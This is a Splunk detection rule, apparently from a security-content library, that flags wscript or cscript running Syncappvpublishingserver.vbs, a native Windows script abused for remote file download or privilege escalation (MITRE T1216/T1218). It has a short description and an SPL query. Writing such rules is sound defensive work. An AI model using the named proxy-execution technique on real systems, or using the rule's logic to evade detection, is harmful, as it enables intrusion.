false positives may be present if the vbscript syncappvpublishingserver is used for legitimate purposes. filter as needed. adding a n; to the command-line arguments may help reduce any noise.

t1216
t1218
endpoint
splunk

Techniques

T1216
T1218

Sample rules

Windows System Script Proxy Execution Syncappvpublishingserver

source: splunk
technicques:
- T1216
- T1218

Description

The following analytic identifies the abuse of Syncappvpublishingserver.vbs, which is a native script on Windows that may be utilized to download remote files or perform privilege escalation.

Detection logic


| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name IN ("wscript.exe","cscript.exe") Processes.process="*syncappvpublishingserver.vbs*" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id 
| `drop_dm_object_name(Processes)` 
| `security_content_ctime(firstTime)` 
| `security_content_ctime(lastTime)` 
| `windows_system_script_proxy_execution_syncappvpublishingserver_filter`